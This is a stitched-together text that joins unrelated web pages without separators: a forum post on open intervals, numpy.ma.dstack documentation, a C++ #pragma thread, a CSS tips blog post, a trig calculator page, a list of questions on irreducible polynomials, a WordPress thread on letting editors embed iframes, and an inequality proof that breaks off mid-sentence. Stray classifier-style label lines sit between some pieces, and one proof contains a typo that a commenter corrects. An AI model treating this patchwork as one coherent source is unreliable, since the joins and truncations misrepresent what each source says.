#11 · fresh_42 · Aug 5, 2016

That's correct.

No. ##(a,b) = \{x \in \mathbb{R} \, | \, a < x < b \}## is an open set, ##(a,b] = \{x \in \mathbb{R} \, | \, a < x \leq b \}## is neither open nor closed, and ##[a,b] = \{x \in \mathbb{R} \, | \, a \leq x \leq b \}## is a closed interval.

What do you mean by "half of ... outside"? We consider an open interval ##(a,b)## in ##X = \mathbb{R}##, a point ##x \in (a,b) \subset X## and a neighborhood ##(x-\epsilon,x+\epsilon) \subset (a,b)## which is entirely within our open set / interval. We then speak of differentiability at (or in) ##x##. The fact that ##(a,b)## is open and ##x \in (a,b)##, that is ##a < x < b##, guarantees us that we can always find some neighborhood left and right of ##x## that is still in ##(a,b)##, so we must not deal with any boundaries, where e.g. there is no limit from the left if it is the left end point. And we can get as close to ##x## as we like - from both sides.

#12 · Aug 5, 2016

Oh shoot. I see. Somehow I thought the open set would include the end points. Thanks. It is so weird where I got confused about this.
numpy.ma.dstack

numpy.ma.dstack(tup) = <numpy.ma.extras._fromnxfunction_seq object>

Stack arrays in sequence depth wise (along third axis).

This is equivalent to concatenation along the third axis after 2-D arrays of shape (M,N) have been reshaped to (M,N,1) and 1-D arrays of shape (N,) have been reshaped to (1,N,1). Rebuilds arrays divided by dsplit.

This function makes most sense for arrays with up to 3 dimensions. For instance, for pixel-data with a height (first axis), width (second axis), and r/g/b channels (third axis). The functions concatenate, stack and block provide more general stacking and concatenation operations.

Parameters:
tup : sequence of arrays
The arrays must have the same shape along all but the third axis. 1-D or 2-D arrays must have the same shape.

Returns:
stacked : ndarray
The array formed by stacking the given arrays, will be at least 3-D.

See also

stack
Join a sequence of arrays along a new axis.
vstack
Stack along first axis.
hstack
Stack along second axis.
concatenate
Join a sequence of arrays along an existing axis.
dsplit
Split array along third axis.

Notes

The function is applied to both the _data and the _mask, if any.

Examples

>>> a = np.array((1,2,3))
>>> b = np.array((2,3,4))
>>> np.dstack((a,b))
array([[[1, 2],
        [2, 3],
        [3, 4]]])

>>> a = np.array([[1],[2],[3]])
>>> b = np.array([[2],[3],[4]])
>>> np.dstack((a,b))
array([[[1, 2]],
       [[2, 3]],
       [[3, 4]]])
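Since the Notes say the function is applied to both the _data and the _mask, a short masked-array sketch in the same doctest style may help (our illustration, not from the reference):

>>> import numpy.ma as ma
>>> a = ma.masked_array([1, 2, 3], mask=[False, True, False])
>>> b = ma.masked_array([2, 3, 4], mask=[True, False, False])
>>> c = ma.dstack((a, b))
>>> c.shape
(1, 3, 2)
>>> c.mask.shape   # the masks are stacked the same way as the data
(1, 3, 2)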
Thread: #pragma ?

#1 · Registered User (Nov 2001)

Can anyone tell me what #pragma does? I'm trying to write DLLs and I see examples using the line:

Code:

    #pragma comment(lib, "theDLL.lib")

I know that if you include that line you can call functions from the DLL file, but then I see some examples do this:

Code:

    extern "C" __declspec(dllimport) void fuction_name( );
    void funtion_name();

Can someone tell me the details of what is happening? THX!
Dat

#2 · Registered User (Apr 2003)

My book says #pragma is specifically for implementation-defined options, so its effect will be described in your compiler documentation, and any #pragma directive that isn't recognized by the compiler will be ignored. Declaring a variable as extern implies that it is defined somewhere outside the present scope. As far as the details of the code you posted, I have no idea.

#3 · Codeplug (Mar 2003)

Here is the reference for all the MSVC pragmas. Enjoy.

gg
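To make the two snippets from the question concrete, here is a minimal sketch of the usual MSVC pattern (the macro name MYDLL_API, the MYDLL_EXPORTS define, and the file names are placeholders, not from the thread):

    // TheDLL.h -- shared by the DLL project and its consumers.
    // When building the DLL itself, define MYDLL_EXPORTS so the functions
    // are exported; everyone else sees dllimport instead.
    #ifdef MYDLL_EXPORTS
    #   define MYDLL_API __declspec(dllexport)
    #else
    #   define MYDLL_API __declspec(dllimport)
    #endif

    extern "C" MYDLL_API void function_name();

    // consumer.cpp
    #include "TheDLL.h"

    // Tells the MSVC linker to pull in the import library, instead of
    // adding theDLL.lib to the project's linker settings by hand.
    #pragma comment(lib, "theDLL.lib")

    int main() {
        function_name();   // resolved via theDLL.lib at link time, theDLL.dll at run time
        return 0;
    }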
Helloooo! Today I'm gonna be talking about 5 CSS features (or actually 3 properties, a pseudo-element, and a pseudo-class) that I think deserve more love.

Table Of Contents

1. accent-color
2. caret-color
3. ::selection (pseudo-element)
4. backdrop-filter
5. :empty (pseudo-class)
6. Final Thoughts

accent-color

To start off, this is a great CSS property just to add a little bit more detail to your user interface. This property applies to the input types:

• <progress>
• <input type="checkbox">
• <input type="range">
• <input type="radio">

The accent-color property allows you to very easily set the accent color (what you often see in radio buttons, checkboxes, etc.) to whatever color you'd like!

Example:

progress {
  accent-color: red;
}

input[type=checkbox] {
  accent-color: red;
}

input[type=radio] {
  accent-color: red;
}

input[type=range] {
  accent-color: red;
}

Accent Color CSS Example

caret-color

While barely noticeable, the caret-color property works perfectly with the accent-color property, and is a very nice little detail you should consider adding and using.

Example:

input {
  caret-color: red;
}

::selection (pseudo-element)

While I know this is not really very unknown, I still don't see it used enough. The simple ::selection pseudo-element can very easily spice up your website by changing the styles of selected elements.

Example:

::selection {
  background: red;
  color: white;
}

Selection Pseudo Element Example

backdrop-filter

Like ::selection, this might not be the most unknown property, but I still don't see it used enough. The backdrop-filter property allows you to apply a variety of filters to the area behind an element.

Options:

• blur()
• brightness()
• contrast()
• drop-shadow()
• grayscale()
• hue-rotate()
• invert()
• opacity()
• sepia()
• saturate()

Example:

div.background {
  background: url(image.jpg) no-repeat center;
  background-size: cover;
  height: 100px;
  width: 100px;
}

div.filterbox {
  background-color: rgba(255, 255, 255, 0.4);
  backdrop-filter: sepia(100%);
  width: 50px;
  height: 100px;
}

Backdrop Filter Example

:empty (pseudo-class)

The :empty pseudo-class matches every element that has no children. Children can be either element nodes or text (including whitespace). A fun use case for this is, for example, while an image is loading:

div {
  width: 60px;
  height: 60px;
  background: grey;
}

div:empty {
  border: 2px solid red;
}

Empty Pseudo Class Example

Final Thoughts

That's it for today's list. There are of course a lot more that I haven't mentioned, but I appreciate you spending your time reading this post. If you'd like to read more, here you go:

🔥 Goodbye Firebase, Hello SupaBase
🏠 Home Page
__label__pos
0.996155
Trigonometric equation solver

This calculator can solve basic trigonometric equations such as: $\color{blue}{ \sin(x) = \frac{1}{2} }$ or $ \color{blue}{ \sqrt{2} \cos\left(-\frac{3x}{4}\right) - 1 = 0 } $. The calculator will find exact or approximate solutions on a custom range. Solutions can be expressed either in radians or degrees.

Examples

Example 1: Solve the equation $ \sin(2x)=\frac{\sqrt{3}}{2} ~~ \text{for} ~~ 0 \leq x \leq 360^\circ $.
Example 2: Find all solutions of the equation $ \cos \left( \frac{3x}{2} \right) = -\frac{\sqrt{2}}{2}$. Express the results in degrees.
Example 3: Find exact solutions of the equation $ \tan \left( -\frac{4x}{3} \right) = 0.4$. Express the results in radians.
Example 4: Solve $ 2\sin \left( x \right) + \sqrt{2}= 0 ~~ \text{for} ~~ -180^\circ \leq x \leq 180^\circ $. Express the results in degrees.
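To make "exact solutions on a custom range" concrete, here is a worked version of Example 1 (my own derivation, not the calculator's output):

$$\sin(2x)=\frac{\sqrt{3}}{2} \;\Longrightarrow\; 2x = 60^\circ + 360^\circ k \quad\text{or}\quad 2x = 120^\circ + 360^\circ k, \qquad k\in\mathbb{Z},$$

so $x = 30^\circ + 180^\circ k$ or $x = 60^\circ + 180^\circ k$. Keeping only $0 \leq x \leq 360^\circ$ gives $x \in \{30^\circ,\, 60^\circ,\, 210^\circ,\, 240^\circ\}$.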
__label__pos
0.999995
Questions tagged [irreducible-polynomials]

Often called prime polynomials. Polynomials that have no polynomial divisors.

1. Is $x^6 + bx^3 + b^2$ irreducible? (3 votes, 2 answers, 91 views; asked by Jérémy Blanc)
Let $b\in \mathbb{Q}^*$ be a rational number. We factorise $x^9-b^3\in \mathbb{Q}[x]$ and obtain $$x^9-b^3=(x^3-b)(x^6+bx^3+b^2).$$ Is the polynomial $x^6+bx^3+b^2$ irreducible? If $b=1$ we get a ...

2. Find the product of all irreducible polynomials over $\mathbb{F}_p$ of degree $n$ (4 votes, 2 answers, 64 views; asked by Martin Brandenburg)
Let $p$ be a prime number and $n \in \mathbb{N}^+$. Let $H_n$ be the product of all monic irreducible polynomials in $\mathbb{F}_p[T]$ whose degree is equal to $n$. What is known about $H_n$? Is there ...

3. Generalization of Eisenstein's Criterion [duplicate] (2 votes, 1 answer, 124 views; asked by Kadmos)
Let $f(X)=a_{2n+1}X^{2n+1}+\ldots+a_0\in \mathbb{Z}[X]$ with $$\begin{align*} a_{2n+1}&\not \equiv 0 \pmod p\\ a_{2n},\ldots,a_{n+1} &\equiv 0 \pmod p\\ a_n,\ldots,a_0&\equiv 0 \pmod{p^2} \end{align*}$$ ...

4. Reduce Polynomial Over Real Numbers (1 vote, 0 answers, 71 views; asked by Dan Lupu)
I was given the question $x^8 + 16$ and told to reduce it as much as able over the real numbers. Here is what I tried: $x^8 + 16$, $(x^4+4)^2-8x^4$, $(x^4+4-2^{3/2}x^2)(x^4+4+2^{3/2}x^2)$. I can not ...

5. $f(x,y,z) := y^2z + yz^2-x^3+xz^2$ is irreducible in $\mathbb{Z}[x,y,z]$? (-1 votes, 0 answers, 48 views; asked by Plantation)
Let $f(x,y,z) := y^2z + yz^2-x^3+xz^2.$ Then $f$ is irreducible in $\mathbb{Z}[x,y,z]$ so that $I:=(f)$ is a prime ideal of $\mathbb{Z}[x,y,z]$? I think that this is my first time of seeing a problem-...

6. Let $L$ be the splitting field of the polynomial $f$ over $K$. Prove that if $n!=[L:K]$, the polynomial is irreducible [closed] (-1 votes, 1 answer, 46 views; asked by darkside)
Let $K$ be a field and $f \in K[x]$ be a non-zero polynomial of degree $n$. Let $L$ be the splitting field of $f$ over $K$. Prove that $[L:K]$ divides $n!$ - I already proved this. Now I am stuck at ...

7. How to generate all elements of an extension field from a base field? (GF(2)) (0 votes, 0 answers, 19 views; asked by Ymi)
I am trying to understand how to show something is a primitive polynomial; I understand it has to be irreducible by definition, and according to Wolfram: ...

8. $y^{q-1}-f(x)$ irreducible over $\overline{F_{q}}[x]$ when $(\deg f,q-1)=1$ (4 votes, 2 answers, 66 views; asked by Espace' etale)
I am trying to solve the following problem, and I'd like to ask for some help. Let $q$ be a prime power, $f(x)\in F_{q}[x]$ a polynomial of degree $d$, such that $(d,q-1)=1$. I'd like to show that $G(...

9. Are irreducible elements of the tensor product of a vector space equivalent to irreducible polynomials? (3 votes, 1 answer, 66 views; asked by Ryan Scott)
I'm looking for some feedback on a construction I came across. Loosely, it entails sending a vector space isomorphically to a vector space of polynomials, 'restoring' the ring structure, and asking ...

10. Is Every Closed Algebraic Set of Dimension $n$ Contained in a Closed Variety of Dimension $n+1$ (5 votes, 0 answers, 134 views; asked by Thomas Anton)
Let $V$ be an algebraic variety of dimension $m$ over an algebraically-closed field of characteristic $0$, and let $n<m$ and $U\subset V$ be a closed subset of $V$. Must there exist a subvariety $U\...

11. Maximal number of multiple points for an irreducible quartic (2 votes, 1 answer, 69 views; asked by Oopsilon)
I was working on this problem, but I don't see how I can solve it. I was given a hint, but I don't know how to use it. Can anyone help me? Thanks in advance! Let $f \in \Bbb C[x_0, x_1, x_2]$ be an ...

12. How do I prove that the primitive elements of a field extension are this way? (0 votes, 0 answers, 43 views; asked by Floralys)
I'm doing an introductory course of field theory and there is one exercise that, as easy as it seems, gets on my nerves. It states: Let $α_1, \dots, α_n ∈ \mathbb{C}$ be the roots of an ...

13. $p$ a prime satisfying $p \equiv 3 \mod 4 $. Then, the quotient field $ F_p [x] / (x^2 + 1)$ contains $\bar{x}$ that is a square root of $-1$ (1 vote, 1 answer, 56 views; asked by pedropedro)
I know that $x^2 + 1$ is irreducible in $F_p[x]$ if and only if $-1$ is not a square in $F_p$. Otherwise, $x^2 + 1$ could be factored out. $-1$ not being a quadratic residue in $F_p$ is equivalent to ...

14. On unique factorization of polynomials (1 vote, 1 answer, 52 views; asked by Alejandro Aguilar)
I'm studying Lang's Linear Algebra and stumbled upon a lemma prior to the unique factorization of polynomials that says the following: "Let p be irreducible in K[t]. Let f, g be non-zero ...

15. Show that $f(x)=x^2+2x-1 \in \mathbb{Z}_3[x]$ is irreducible over $\mathbb{Z}_3$. And find the elements of a finite field with 9 elements. (1 vote, 1 answer, 73 views; asked by ARROW)
Show that $f(x)=x^2+2x-1 \in \mathbb{Z}_3[x]$ is irreducible over $\mathbb{Z}_3$. Using this fact construct a finite field $\mathbb{F}_9$ of $9$ elements. If $\alpha$ is a root of $f(x)$, then find ...

16. Generalization or criteria for a proposition for checking irreducibility of polynomials with summands of only two degrees (0 votes, 1 answer, 50 views; asked by onriv)
Is the following proposition true? Prop: Let $f \in k\left[x_1, x_2, \ldots, x_n\right]$ be a polynomial with the form $l+h$, where $l$ is an irreducible non-constant homogeneous polynomial and $h$ is a ...

17. Question about the solution of "the polynomial $(x−1)(x−2)⋯(x−n)−1$ is irreducible in $\mathbb{Z}\left [ x \right ]$ for all $n≥1$" (0 votes, 1 answer, 100 views; asked by Zhiwei)
The solution of "the polynomial $(x−1)(x−2)⋯(x−n)−1$ is irreducible in $\mathbb{Z}\left [ x \right ]$ for all $n≥1$" is in here. I think it's no problem to do the same thing on $\mathbb{Q\left [ x \...

18. Reducibility of constrained polynomial (0 votes, 1 answer, 40 views; asked by Thomas)
Let $f \in \mathbb{Z}[x, y]$ be a polynomial. Suppose that the list of terms of $f$ does not involve the $y$ variable except for a single $y^2$ term with some arbitrary coefficient. When is $f$ ...

19. Quintic equation with integer coefficients (2 votes, 2 answers, 155 views; asked by Mikhail Gaichenkov)
I am looking for a way to find a closed form of the real root of the quintic equation with integer coefficients: $x^5+3x^4+4x^3+x-1=0$. According to the numerical calculation the root $x_0\approx 0.$...

20. Is there a special name for linear irreducible polynomials (over the complex numbers)? (1 vote, 1 answer, 37 views; asked by zvavybir)
According to the fundamental theorem of algebra every polynomial over the complex numbers can be factorized into the following form: $$ c (x - r_1) (x - r_2) (x - r_3) \dots $$ where $r_i$ are the ...

21. $x^m+y^m+1$ is irreducible in $k[x,y]$ (0 votes, 1 answer, 59 views; asked by confused)
Question: Let $k$ be a field with characteristic $0$. Let $m\geq 2$ be an integer. Show that $f(x,y)=x^m+y^m+1$ is irreducible in $k[x,y]$. Answer: I have no idea how to solve this question. Any hint/...

22. Let $\alpha \in \mathbb{C}$ a root of $f(x)=x^3-3x-1$. Prove $f$ is irreducible over $\mathbb{Q}$. (1 vote, 1 answer, 40 views; asked by Anon)
I encountered the following claim: Let $\alpha \in \mathbb{C}$ a root of $f(x)=x^3-3x-1$. Prove $f$ is irreducible over $\mathbb{Q}$. The explanation included something of the form: Since $f$ has ...

23. Different approach to see that $X^{nm}-2^n3^m$ is irreducible over $\mathbb{Z}$ [duplicate] (3 votes, 0 answers, 62 views; asked by Masacroso)
I came across the problem to show that when $n,m\in \mathbb{N}$ are coprime then the polynomial $X^{nm}-2^n3^m$ is irreducible over $\mathbb{Z}$. I solved it appealing to knowledge of complex numbers, ...

24. $p$ odd prime and $n$ integer. Prove that $x^n - p$ is irreducible over $\mathbb{Z}[i]$ (0 votes, 0 answers, 60 views; asked by Jensyn Jessid Pérez Lucio)
By Eisenstein's criterion I know that the polynomial is irreducible in $\mathbb{Z}[X]$, since $p$ divides $p$ and $p^2$ does not divide $p$. But I do not know how to extend to $\mathbb{Z}[i]$.

25. What are elements of the field $\frac{\mathbb{F}_2[x,y]}{x^3-y^2+x+1}$? Is that polynomial irreducible? (0 votes, 1 answer, 98 views; asked by Tomas Rojas)
On a previous problem, I had the field $A=\mathbb{F}_3[x]$ and the polynomial $p(x)=x^3+x+1$, where that polynomial is reducible in $\mathbb{F}_3$, then I had $\frac{A}{p(x)}$ and I had to find its ...

26. Prove that $f$ is irreducible if it has no roots in a finite field $F$. [closed] (0 votes, 1 answer, 60 views; asked by mathematica)
Let $f\in\mathbb{Z}[X]$ be a monic polynomial with $\text{deg}(f)=5$. Suppose that there exist a prime number $p$ and a finite field $F$ of order $p^2$ such that $f$ has no roots in $F$. Prove that $f$...

27. How can I know if the polynomial $x^4 -16x^3 +12x^2 - 3x + 9$ is irreducible over $\mathbb{Z}$? (3 votes, 1 answer, 96 views; asked by Jensyn Jessid Pérez Lucio)
How can I know if the polynomial $x^4 -16x^3 +12x^2 - 3x + 9$ is irreducible over $\mathbb{Z}$? I have tried to use Eisenstein's criterion by evaluating on polynomials of the form $ax+b$ but I have not ...

28. Does $\sqrt a + \sqrt b$ have a four-way conjugate? (6 votes, 1 answer, 92 views; asked by SRobertJames)
Let $a, b$ be rational numbers that are not perfect squares. Consider the set $S = \{\sqrt a + \sqrt b, \sqrt a - \sqrt b, - \sqrt a + \sqrt b, -\sqrt a - \sqrt b\}$. If $p$ is a polynomial with ...

29. $x^6 + 69x^5 − 511x + 363$ is irreducible over $\mathbb Z$? (3 votes, 2 answers, 194 views; asked by SummerAtlas)
As mentioned, I am trying to show that $x^6 + 69x^5 − 511x + 363$ is irreducible over $\mathbb Z$. To see that it has no roots and no cubic factors, I send the polynomial to $\mathbb F_7$ and $\mathbb ...

30. Knowing that $f'$ has a rational root, what can we say about the discriminant of a root of $f$, where $f$ is monic and irreducible over $\mathbb{Z}$ (1 vote, 1 answer, 36 views; asked by ShyamalSayak)
Let $f(x)$ be a monic irreducible polynomial over $\mathbb{Z}$ and let $\alpha$ be a root of $f$. Then I have to show that $f(r)~|~disc(\alpha)$, when $f'(x)$ has a root $r$ in $\mathbb{Z}$. These are ...

31. Does non-zero absolute trace of an element $\alpha$ imply the irreducibility of $f(x)=x^p-x-\alpha$ (2 votes, 1 answer, 40 views; asked by MinecraftPlayer69)
I am currently reading the paper "Fast Construction of Irreducible Polynomials over Finite Fields" by Couveignes and Lercier. On page 81, it reads, "... So $1/(1-b)$ is a root of the ...

32. Monic irreducible polynomial $f \in \mathbb{Z}[x]$ of degree $n$ such that $\operatorname{Gal}(f) \cap C_j \neq \emptyset$ $ \forall j$… (1 vote, 1 answer, 61 views; asked by Gokimo)
I'm trying to solve the following problem: Let $C_1, \ldots, C_m \subseteq S_n$ be conjugacy classes of elements in $S_n$. Show that there exists a monic irreducible polynomial $f \in \mathbb{Z}[x]$ ...

33. $-3x^{2m}+7x^m-3$ is irreducible for all $m\geq 1$ (2 votes, 1 answer, 117 views; asked by NothingInSense)
I have heard that $p(x)=-3x^2+7x-3$ is the simplest polynomial for which $p(1)=1$, $p(x)=x^{\deg p}\cdot p(x^{-1})$ and $p(x^m)$ is irreducible for all $m\geq 1$. I have tried to show the last part, i....

34. Proving that a smooth affine variety is irreducible (1 vote, 0 answers, 76 views; asked by Cactus)
I am struggling with the following problem. Given a complex polynomial $f : \mathbb{C}^n \rightarrow \mathbb{C}$ such that $\nabla f$ doesn't vanish anywhere on the whole $\mathbb{C}^n$, $V = V(f)$ is ...

35. Is $x^{100} - x^2 + 1$ separable in an algebraic closure of $\mathbb{F}_2$ (1 vote, 1 answer, 72 views; asked by NiRvanA)
My approach: $f'(X) = 100x^{99} - 2x = 0x^{99} - 0x = 0$ since in $\mathbb{F}_2$. So the $\gcd(f,f') = f > 1$, thus not separable. On the other hand, $f(0) \neq 0 \neq f(1)$, so irreducible. But ...

36. Multiple roots of irreducible polynomials over fields of positive characteristic (1 vote, 1 answer, 40 views; asked by Francisca Aguayo)
It can be proved that if $K$ is a field, then $f \in K[x]$ has $a$ as a multiple root if and only if $f(a) = f'(a) = 0$. And as a corollary, if $K$ has characteristic $0$, then irreducible polynomials do ...

37. Is $13x^5 + (3 − i)x^3 + (8 − i)(x^2 − x) + 1 − 2i$ irreducible in $(\mathbb{Q}[i])[x]$? (0 votes, 1 answer, 54 views; asked by Dawid)
Is $$13x^5 + (3 − i)x^3 + (8 − i)(x^2 − x) + 1 − 2i$$ irreducible in $(\mathbb{Q}[i])[x]$? I've tried using Eisenstein's irreducibility criterion to prove that it is, but I don't think it applies ...

38. Show that $\langle X_1X_4-X_2X_3 \rangle$ is irreducible in $\mathbb{Q}[X_1,X_2,X_3,X_4]$. (2 votes, 1 answer, 67 views; asked by 3nondatur)
In lecture we did the following example: Show that $X_1X_4-X_2X_3$ is irreducible in $\mathbb{Q}[X_1,X_2,X_3,X_4]$. We wrote down that if $X_1X_4-X_2X_3 = a\cdot b$ for some $a,b \in \mathbb{Q}[X_1,...

39. Factorization over $\mathbb{Q}$ and $\mathbb{Z_{41}}$ (1 vote, 2 answers, 67 views; asked by jontao)
Factor $f(x) = x^4+1$ over $\mathbb{Q}$ and over $\mathbb{Z_{41}}$. 1) I can't factor $f(x)$ over $\mathbb{Q}$ because $f(x+1)$ is irreducible by Eisenstein's criterion. 2) I don't know where to start: ...

40. Showing that $f=X^p-X+T$ is irreducible over $\mathbb{F}_p(T)[X]$ (3 votes, 2 answers, 111 views; asked by Gokimo)
Let $K=\mathbb{F}_p(T)$ be the field of rational functions in one variable $T$ over $\mathbb{F}_p$, and $f=X^p-X+T \in K[X]$. I want to show that $f$ is an irreducible polynomial. I know that $T$ is a ...

41. $x^{\frac{p-1}{2}}+1$ is reducible in $\Bbb Z_p[x]$ [closed] (0 votes, 2 answers, 45 views; asked by Hobby)
Let $p$ be an odd prime. Prove that the polynomial $f(x) = x^{\frac{p-1}{2}}+1$ is reducible in $\Bbb Z_p[x]$ and factor $f(x)$ into irreducible polynomials in $\Bbb Z_p[x]$. I've been struggling ...

42. Dimension of $\mathbb{Q(\omega)}$ and minimal polynomial of $\sqrt[3]{2}$ (1 vote, 1 answer, 42 views; asked by jontao)
Consider: $$\omega = \frac{-1}{2} + \frac{\sqrt{3} i}{2}$$ and the simple extension $\mathbb{Q(\omega)}$. Find the dimension of $\mathbb{Q(\omega)}$ and the minimal polynomial of $\sqrt[3]{2}$ over $\...

43. Asking for help on proving an irreducible polynomial in $K[x]$ (1 vote, 0 answers, 53 views; asked by Kelvin)
Let $F$ be a field and $a,b\in F$ with $a\ne0$. Then, $f(x)\in F[x]$ is irreducible if and only if $f(ax+b)\in F[x]$ is irreducible. This is my proof: $(\Rightarrow)$ Suppose $f(x)=h(x)g(x)$ is ...

44. An irreducible polynomial over $\mathbb{Z}_p$ [duplicate] (0 votes, 0 answers, 36 views; asked by Леонид Сергеевич)
In general, there is a problem: "Prove that the polynomial $f(x) = x^{p} - x - 1$ is irreducible over $\mathbb{Z}_p$ ($p$ is a prime number)". I had an idea to solve this problem using the ...

45. Some properties about $\mathbb{F}_3[x]/(x^3+x+1)$ (0 votes, 1 answer, 66 views; asked by HornyPigeon54)
I am given $L:=\frac{\mathbb{F}_3[x]}{(x^3+x+1)}$ and I have to prove different properties about this object. First of all, since the polynomial by which I take the quotient is reducible $$x^3+x+1=(...

46. Integral solutions of polynomials in two variables (3 votes, 2 answers, 147 views; asked by debanjana)
Consider the polynomial $$ 27x^4 - 256 y^3 = k^2, $$ where $k$ is an integer. As $k$ varies over all positive integers, is it possible to show that there are infinitely many distinct integral ...

47. Using translations to apply Eisenstein's criterion of irreducibility - some kind of bound or condition? [duplicate] (1 vote, 0 answers, 25 views; asked by Robin)
Eisenstein's criterion states that for a polynomial $$f(X)=a_0 + a_1X + ... + a_nX^n$$ with $a_0, ..., a_n \in \mathbb{Z}$ (or more generally a UFD), then if there exists a prime $p$ such that $p \...

48. Is $x^2+x-1\in\mathbb{F}_3[x]$ irreducible? (1 vote, 1 answer, 80 views; asked by HornyPigeon54)
I have to see whether $x^2+x-1\in\mathbb{F}_3[x]$ is irreducible. One first way to see this is by checking if there exist any roots of the polynomial in the field; the problem is that I don't ...

49. Incorrect solution for A Book of Abstract Algebra, Chapter 26, Question E4 (5 votes, 0 answers, 96 views; asked by dryoung)
For this exercise, you are supposed to show that the polynomial $$ x^4+1 $$ is irreducible in $\mathbb{Z}_5$. However, I found that $$ (x^2+2)(x^2+3) = x^4+5x^2+6 = x^4+1. $$ Is the ...

50. Irreducible polynomial examples in Gallian's Contemporary Abstract Algebra (0 votes, 0 answers, 35 views; asked by Pat Muchmore)
In Chapter 17 of Gallian's Contemporary Abstract Algebra, 8th Edition, irreducible polynomials are defined as: in an integral domain $D$, whenever $f(x)$ from $D[x]$ is expressed as a product $f(x)=g(...
__label__pos
0.983392
Allow Editors to Post iFrame embeds

Dean (@deantester):

We are running a large multisite and we have users who now want to embed Facebook videos on their pages. I'd like to enable them to do this by pasting the iframe into a Custom HTML block. This works fine for admins, but Editors are not able to post iframes (the content is stripped), likely because the unfiltered_html capability is only available to Super Admins. How can I give them this capability? I've tried a plugin (Menu Editor Pro) and some code, but neither worked. Here's the code I tried in functions.php:

function add_theme_caps() {
	// Get the editor role object.
	$role = get_role( 'editor' );
	// Grant the capability directly on the role instance.
	$role->add_cap( 'unfiltered_html' );
}
add_action( 'admin_init', 'add_theme_caps' );

We cannot do this with "Embed" blocks because Facebook has blocked oEmbed, and I cannot ask users to connect their Facebook pages, use app IDs, etc., that are required by other plugins.

Viewing 3 replies - 1 through 3 (of 3 total)

MK (@mkarimzada):

Use the map_meta_cap() function to add caps to a specific role in multisite. It's also possible to use kses_remove_filters() on a specific page or for a specific user/role. Example:

function editor_unfiltered_html_cap( $caps, $cap, $user_id, $args ) {
	$user = get_userdata( $user_id );
	$user_roles = $user->roles;
	if ( in_array( 'editor', $user_roles, true ) && ! defined( 'DISALLOW_UNFILTERED_HTML' ) ) {
		$caps[] = 'unfiltered_html';
	}
	return $caps;
}
add_filter( 'map_meta_cap', 'editor_unfiltered_html_cap', 10, 4 );

I hope this helps.

(This reply was modified 1 month, 1 week ago by MK. Reason: improved if statement)

Dean (@deantester):

Thank you @mkarimzada for the reply, but that code was unsuccessful in resolving my issue; editors are still not able to update iframes.

MK (@mkarimzada):

This seems to be a change in the security policies of Gutenberg, and I'm 100% sure there is a reason for it. I've found this open issue on the Gutenberg repo: https://github.com/WordPress/gutenberg/issues/15137. Have you tried Unfiltered MU by Automattic?

Another possible solution would be allowing iframes via wp_kses_allowed_html, but this is not recommended. Also, you need to make sure editors are 100% trusted before doing this.

function allow_iframes_for_editor( $allowed_tags ) {
	// Leave the defaults untouched for everyone who is not an editor.
	if ( ! current_user_can( 'editor' ) ) {
		return $allowed_tags;
	}
	$allowed_tags['iframe'] = array(
		'align'                 => true,
		'allow'                 => true,
		'allowfullscreen'       => true,
		'class'                 => true,
		'frameborder'           => true,
		'height'                => true,
		'id'                    => true,
		'marginheight'          => true,
		'marginwidth'           => true,
		'mozallowfullscreen'    => true,
		'name'                  => true,
		'scrolling'             => true,
		'src'                   => true,
		'style'                 => true,
		'title'                 => true,
		'webkitallowfullscreen' => true,
		'width'                 => true,
	);
	return $allowed_tags;
}
add_filter( 'wp_kses_allowed_html', 'allow_iframes_for_editor', 1 );

I hope this helps.
__label__pos
0.946092
Question (4 votes): Prove that:
$$ \left(a+\frac{1}{a}\right)^2+\left(b+\frac{1}{b}\right)^2\ge\frac{25}{2} $$
if $a,b$ are positive real numbers such that $a+b=1$.

I have tried expanding the squares and rewriting them such that $a+b$ is a term (or part of a term), but what I get is completely contradictory to what is asked to prove.

Comments:
• Maybe use the fact that $(a+b)^2=1$ also. – Sam Weatherhog, Nov 3 '15
• Is that a typo, or is it not symmetric? That is, did you intend the $\color{Red}2$ to be in $(a+\frac1{a^{\color{Red}2}})^2$ and not in $(b+\frac1b)^2$? – Akiva Weinberger
• Should the second term be $\left(b+\frac{1}{b^2}\right)^2$? – Sam Weatherhog
• I'm guessing that the first expression should be $(a+\frac 1a)^2$. – WW1
• I'm sorry. It's $(a+1/a)^2$. – Gayatri

Answer (8 votes):

For $E=(a+1/a)^2+(b+1/b)^2=a^2+b^2+1/a^2+1/b^2+4$ you have $1=(a+b)^2=a^2+b^2+2ab\leq 2(a^2+b^2)$, so $a^2+b^2\geq 1/2$. Moreover, $\frac{a+b}{2}\geq 2\sqrt{ab}$ so $\frac{1}{(ab)^2}\geq 16$. This implies $$E=a^2+b^2+\frac{a^2+b^2}{a^2b^2}+4\geq 9/2+8=\frac{25}{2},$$ because $\frac{a^2+b^2}{a^2b^2}\geq \frac{1}{2}\cdot 16=8$.

Comments:
• Very cool solution. Much more direct than my method. – goblin
• Nice +1. For the current version of the problem, you may say $\dfrac1{a^2}>\dfrac1a$, so there is strict inequality. – Macavity
• Really elegant solution! +1 – ZFR
• Thank you for the solutions provided. I am trying to understand them, but I am not able to understand this part: how was $\frac{a+b}{2} \ge 2\sqrt{ab}$ derived? – Gayatri
• It is a typo, it should be $a+b\ge 2\sqrt{ab}$, which is really what is used in the next line. This follows from $(\sqrt a - \sqrt b)^2\ge 0$ and is well known, very useful to remember. – Macavity

Answer (6 votes):

For your revised question, another way is to note that $(x + \frac1x)^2$ is convex, so by Jensen's inequality:
$$\left(a + \frac1a\right)^2 + \left(b + \frac1b\right)^2 \ge 2\left(\frac{a+b}2 + \frac2{a+b}\right)^2=2\left(\frac12 + 2\right)^2=\frac{25}2$$

Answer (0 votes):

Without loss of generality we can choose $a=\sin^2 x$ and $b=\cos^2 x$ for $x \in \left(0, \frac{\pi}{2}\right)$.

Now
$$a^2+b^2=\sin^4 x+\cos^4 x=1-2\sin^2 x\cos^2 x=1-\frac{\sin^2 2x}{2}=\frac{3+\cos 4x}{4} \ge \frac{1}{2},$$
with equality at $x=\frac{\pi}{4}$.

Also $2\sin x\cos x \le 1$, which implies
$$\frac{1}{\sin^4 x\cos^4 x} \ge 16.$$

Now by the Cauchy-Schwarz inequality
$$\left(\frac{1}{a^2}+\frac{1}{b^2}\right)(1^2+1^2) \ge\left(\frac{1}{a}+\frac{1}{b}\right)^2=(\sec^2 x+\csc^2 x)^2=(\sec^2 x\csc^2 x)^2=\sec^4 x\csc^4 x=\frac{1}{\sin^4 x\cos^4 x} \ge 16.$$

Thus
